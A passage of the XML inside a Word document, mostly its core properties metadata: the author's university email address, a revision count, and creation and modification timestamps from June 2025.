      <w:sz w:val="22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FD7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D7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D7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D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D7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D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D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D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D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D7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D7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D7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D70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D70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D70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D70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D70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D70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D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D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D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D7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D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D70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D70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D70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D7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D70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D7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emrecanatlihan@posta.mu.edu.tr</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>emrecanatlihan@posta.mu.edu.tr</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-15T22:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-15T22:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>